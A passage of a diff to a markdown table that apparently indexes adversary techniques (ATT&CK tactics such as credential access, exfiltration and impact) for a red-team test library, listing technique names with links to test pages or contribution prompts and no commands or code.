-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1551.004/T1551.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Launch Agent](../../T1543.001/T1543.001.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Launchd](../../T1053.004/T1053.004.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Launchd](../../T1053.004/T1053.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Plist Modification](../../T1547.011/T1547.011.md) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Rc.common](../../T1037.004/T1037.004.md) | [Rc.common](../../T1037.004/T1037.004.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Startup Items](../../T1037.005/T1037.005.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
